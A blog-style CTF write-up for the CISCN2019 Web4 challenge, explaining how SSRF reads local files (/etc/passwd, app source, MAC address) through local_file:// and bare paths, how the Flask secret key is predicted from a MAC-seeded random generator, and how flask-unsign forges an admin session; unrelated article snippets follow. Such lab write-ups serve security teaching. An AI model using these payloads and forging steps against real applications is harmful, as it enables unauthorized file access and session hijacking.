BUU [CISCN2019 华东南赛区]Web4
BUU [CISCN2019 华东南赛区]Web4
题目描述:Click to launch instance.
开题:
点击链接,有点像SSRF
使用local_file://协议读到本地文件,无法使用file://协议读取,有过滤。
local_file://协议:
local_file://与file://类似,常用于绕过,可以直接读取本地文件内容
此外,不加协议,直接通过文件名读取文件也行。
/read?url=/etc/passwd
读取后端源码:
/read?url=/app/app.py
源码如下:
import re, random, uuid, urllib
from flask import Flask, session, requestapp = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True@app.route('/')
def index():session['username'] = 'www-data'return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('^file.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m or n:return 'No Hack'res = urllib.urlopen(url)return res.read()except Exception as ex:print str(ex)return 'no response'@app.route('/flag')
def flag():if session and session['username'] == 'fuck':return open('/flag.txt').read()else:return 'Access denied'if __name__=='__main__':app.run(debug=True,host="0.0.0.0")
注意print语句print str(ex),可以看出后端是python2。
/flag路由验证了session,若session中的username是fuck,则返回flag。
session的密钥由random决定,random的seed是uuid.getnode()。
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
对于伪随机数,如果seed是固定的,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。这里的seed使用的uuid.getnode()的值,该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。
Mac地址存贮在/sys/class/net/eth0/address
/read?url=local_file:///sys/class/net/eth0/address
得到Mac地址为:2e:44:62:0d:63:0a。
根据seed预测伪随机数得到key脚本:(python2跑)
import random
random.seed(0x2e44620d630a)
print(str(random.random()*233))
得到key是73.2021768198,不同人不一样。
我们使用flask-unsign工具来伪造session。
解密session:
flask-unsign --decode --cookie 'eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.ZW2pEQ.-5oJLoBW97fPu-L4toFRwPeAwhE'
加密session:
flask-unsign --sign --cookie "{'username': b'fuck'}" --secret '73.2021768198' --no-literal-eval
得到eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZW2rIw.tPiShhd3WU6VOLoSrTgWQus8Pjc
访问/flag路由,得到flag
相关文章:
BUU [CISCN2019 华东南赛区]Web4
BUU [CISCN2019 华东南赛区]Web4 题目描述:Click to launch instance. 开题: 点击链接,有点像SSRF 使用local_file://协议读到本地文件,无法使用file://协议读取,有过滤。 local_file://协议: local_file…...
【卷积神经网络中用1*1 卷积有什么作用或者好处呢?】
🚀 作者 :“码上有前” 🚀 文章简介 :深度学习 🚀 欢迎小伙伴们 点赞👍、收藏⭐、留言💬 1*1 卷积有什么作用或者好处呢 作用降维和增加非线性特征组合和交互网络的宽度和深度调整全连接替代增强…...
分布式系统概念及其应用
分布式系统概念及其应用 随着互联网的飞速发展,数据量和计算需求不断增加,传统的集中式系统已经无法满足这些需求。因此,分布式系统应运而生,它通过将计算任务分散到多台计算机上,实现高效的计算和存储。本文将介绍分…...
数据报文转换
报文转换 🍓JSON🍒🍒JSON多字段映射成一个实体对象🍒🍒JSON反序列化为一个带有泛型的JAVA类型 🍓xml 🍓JSON 🍒🍒JSON多字段映射成一个实体对象 <dependency><…...
Python爬虫-付费代理推荐和使用
付费代理的使用 相对免费代理来说,付费代理的稳定性更高。本节将介绍爬虫付费代理的相关使用过程。 1. 付费代理分类 付费代理分为两类: 一类提供接口获取海量代理,按天或者按量收费,如讯代理。 一类搭建了代理隧道࿰…...
kubectl使用及源码阅读
目录 概述实践样例yaml 中的必须字段 kubectl 代码原理kubectl 命令行设置pprof 抓取火焰图kubectl 中的 cobra 七大分组命令kubectl createcreateCmd中的builder模式createCmd中的visitor访问者模式外层VisitorFunc分析 结束 概述 k8s 版本 v1.24.16 kubectl的职责 1.主要的…...
C++面试宝典第32题:零钱兑换
题目 给定不同面额的硬币coins和一个总金额amount,编写一个函数来计算可以凑成总金额所需的最少的硬币个数。如果没有任何一种硬币组合能组成总金额,则返回-1。说明:你可以认为每种硬币的数量是无限的。 示例1: 输入:coins = [1, 2, 5], amount = 11 输出:3 解释:11 = …...
pyspark分布式部署随机森林算法
前言 分布式算法的文章我早就想写了,但是一直比较忙,没有写,最近一个项目又用到了,就记录一下运用Spark部署机器学习分类算法-随机森林的记录过程,写了一个demo。 基于pyspark的随机森林算法预测客户 本次实验采用的…...
【Python笔记-设计模式】中介者模式
一、说明 中介者模式是一种行为设计模式,减少对象之间混乱无序的依赖关系。该模式会限制对象之间的直接交互,迫使它们通过一个中介者对象进行合作。 (一) 解决问题 降低系统中对象之间的直接通信,将复杂的交互转化为通过中介者进行的间接交…...
)
大语言模型构建的主要四个阶段(各阶段使用的算法、数据、难点以及实践经验)
大语言模型构建通常包含以下四个主要阶段:预训练、有监督微调、奖励建模和强化学习,简要介绍各阶段使用的算法、数据、难点以及实践经验。 预训练 需要利用包含数千亿甚至数万亿 单词的训练数据,并借助由数千块高性能 GPU 和高速网络组成的…...
[云原生] 二进制安装K8S(中)部署网络插件和DNS
书接上文,我们继续部署剩余的插件 一、K8s的CNI网络插件模式 2.1 k8s的三种网络模式 K8S 中 Pod 网络通信: (1)Pod 内容器与容器之间的通信 在同一个 Pod 内的容器(Pod 内的容器是不会跨宿主机的)共享…...
云端技术驾驭DAY13——Pod污点、容忍策略、Pod优先级与抢占、容器安全
往期回顾: 云端技术驾驭DAY01——云计算底层技术奥秘、云服务器磁盘技术、虚拟化管理、公有云概述 云端技术驾驭DAY02——华为云管理、云主机管理、跳板机配置、制作私有镜像模板 云端技术驾驭DAY03——云主机网站部署、web集群部署、Elasticsearch安装 云端技术驾驭…...
掌握Docker:让你的应用轻松部署和管理
文章目录 一、引言(为什么要学习docker?)1.1 环境不一致1.2 隔离性1.3 弹性伸缩1.4 学习成本 二、Docker介绍2.1 Docker的由来2.2 什么是Docker2.3 为什么要用Docker2.3.1 虚拟机2.3.2 Linux容器 2.4 Docker与传统虚拟机的区别2.5 Docker的思…...
5G-A,未来已来
目前,全国首个5G-A规模组网示范完成。这项由北京联通携手华为共同打造的示范项目,实现了北京市中心金融街、历史建筑长话大楼、大型综合性体育场北京工人体育场三个重点场景的连片覆盖。 实际路测结果显示,5G-A用户下行峰值速率达到10Gbps&am…...
智慧公厕让社区生活更美好
随着科技的迅猛发展,城市管理、城市服务均使用科技化的手段进行升级改造,社区生活更美好赋予全新的智慧效能,其中智慧公厕也成为了城市环卫设施的新宠。智慧公厕以物联网、互联网、大数据、云计算、5G通信、自动化控制等技术为核心࿰…...
Apache软件基金会的孵化标准和毕业标准
Apache软件基金会的孵化标准和毕业标准是一个项目成功的重要衡量指标。这些标准关注项目的多个方面,包括开放性、合作性、共建性、透明性、技术可行性、社区建设以及用户基础等。在孵化阶段,Apache软件基金会主要关注项目的开放性和合作性。首先…...
什么是高可用架构
一、什么是高可用 在运维中,经常听到高可用,那么什么是高可用架构呢?通俗点讲,高可用就是在服务故障,节点宕机的情况下,业务能够保证不中断,服务正常运行。 举个例子,支付宝&#…...
【Vuforia+Unity】AR04-地面、桌面平面识别功能(Ground Plane Target)
不论你是否曾有过相关经验,只要跟随本文的步骤,你就可以成功地创建你自己的AR应用。 官方教程Ground Plane in Unity | Vuforia Library 这个功能很棒,但是要求也很不友好,只能支持部分移动设备,具体清单如下: 01.Vuforia的地面识别功能仅支持的设备清单: Recommended…...
【Git】解决‘每次初始化一个新仓库时,都需要执行git config --global --add safe.directory命令‘
问题 这个命令是用来将一个安全目录添加到全局的 Git 配置中。但每次克隆一个仓库或者新建一个仓库,并且对该仓库进行操作时,都需要执行该命令,十分麻烦! 这是因为,Git 近期进行了版本升级,添加了新的目录…...
Qt的QThread、QRunnable和QThreadPool的使用
1.相关描述 随机生产1000个数字,然后进行冒泡排序与快速排序。随机生成类继承QThread类、冒泡排序使用moveToThread方法添加到一个线程中、快速排序类继承QRunnable类,添加到线程池中进行排序。 2.相关界面 3.相关代码 widget.cpp #include "widget…...
DAMOYOLO-S模型剪枝与量化实战:基于PyTorch的模型轻量化部署
DAMOYOLO-S模型剪枝与量化实战:基于PyTorch的模型轻量化部署 想把手头训练好的DAMOYOLO-S目标检测模型塞进树莓派或者Jetson Nano这类边缘设备里跑起来,是不是经常遇到模型太大、推理太慢的尴尬?原版模型动辄几十上百兆,在资源有…...
Qwen3-4B-Thinking律所知识管理:判例库问答+服务产品包装+合同模板
Qwen3-4B-Thinking律所知识管理:判例库问答服务产品包装合同模板 1. 模型概述与核心能力 Qwen3-4B-Thinking是基于通义千问Qwen3-4B官方模型开发的专业版本,特别针对法律行业知识管理场景进行了优化。该模型采用稠密(Dense)架构,4B参数规模…...
Laratrust项目实战:从零搭建一个完整的权限管理后台
Laratrust项目实战:从零搭建一个完整的权限管理后台 【免费下载链接】laratrust Handle roles and permissions in your Laravel application 项目地址: https://gitcode.com/gh_mirrors/la/laratrust Laratrust是一款专为Laravel应用设计的权限管理工具&…...
为什么 AI 推理一定要有 /metrics 和 /health?一篇讲清可观测性接口的工程意义
一、引言 很多人在做 AI 推理服务时,第一反应通常是: 模型能跑起来就行API 能返回结果就行页面能看到输出就行 于是整个系统上线后,对外可能只有一个接口: POST /generate 或者: POST /chat 表面上看࿰…...
 failed’卡住了)
Nginx SSL证书配置:从.pem到.crt,别再被‘BIO_new_file() failed’卡住了
Nginx SSL证书配置实战:从文件格式到权限管理的完整指南 当你第一次在Nginx配置中看到BIO_new_file() failed这个错误时,可能会感到困惑。这个看似简单的错误背后,实际上隐藏着证书文件格式、路径权限、容器映射等多重技术细节。本文将带你深…...
)
别再只插USB了!树莓派Pico的VSYS、3V3、VBUS引脚供电方案全解析(附电池供电实战)
树莓派Pico供电系统深度实战:从锂电池管理到多电源无缝切换 当第一次将树莓派Pico从USB线缆上拔下来时,那种摆脱线材束缚的自由感令人兴奋——直到发现设备突然断电。这个场景揭示了嵌入式开发中最基础却最容易被忽视的问题:如何为移动中的Pi…...
HTTP协议必知必会详解
系列文章目录 文章目录系列文章目录摘要一、开篇:你真的分得清 HTTP 和 HTML 吗?二、HTTP 的本质:浏览器与服务器的 "约定语言"三、一次完整的 HTTP 请求,到底经历了什么?四、拆解 HTTP 报文:请求…...
Grafana Loki 从零到一:Windows环境部署、配置与典型问题排查指南
1. 为什么选择Grafana Loki? 如果你正在寻找一个轻量级的日志聚合系统,Grafana Loki绝对值得考虑。相比传统的ELK方案,Loki最大的特点就是"只索引日志元数据"的设计理念。简单来说,它不会像Elasticsearch那样对日志内容…...
机器人进厂打工首秀并不惊艳,机械臂干的活罢了,纯粹多此一举!
某家机器人企业的机器人进厂打工了,还视频直播了8小时,他们大力度赞誉机器人干活精准,然而查看了这场直播,发现这与人工智能并无太大关系,倒是更类似于普通工业机器人--机械臂就能干的活,非要弄个机器人来干…...
号令天下专业版:祸害磁场中间夹0有什么影响
祸害磁场中间夹入数字0所产生的影响,可从多个维度展开深入剖析。祸害磁场中间夹0究竟有着怎样的影响呢?祸害磁场的固有特性祸害磁场本身与数字0相结合,往往被视作带有一定负面能量。就拿祸害磁场来说,它通常和出色的口才紧密相连&…...